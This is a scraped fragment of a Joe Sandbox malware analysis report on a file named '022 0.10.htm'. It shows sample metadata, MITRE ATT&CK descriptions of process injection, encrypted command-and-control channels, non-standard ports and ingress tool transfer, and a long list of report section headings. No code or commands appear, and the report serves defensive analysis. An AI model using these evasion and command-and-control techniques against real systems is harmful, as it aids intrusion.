Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 022 0.10.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 136

Chrome Cache Entry: 137

Chrome Cache Entry: 138

Chrome Cache Entry: 139

Chrome Cache Entry: 140

Chrome Cache Entry: 141

Chrome Cache Entry: 142

Chrome Cache Entry: 143

Chrome Cache Entry: 144

Chrome Cache Entry: 145

Chrome Cache Entry: 146

Chrome Cache Entry: 147

Chrome Cache Entry: 148

Chrome Cache Entry: 149

Chrome Cache Entry: 150

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
022 0.10.htm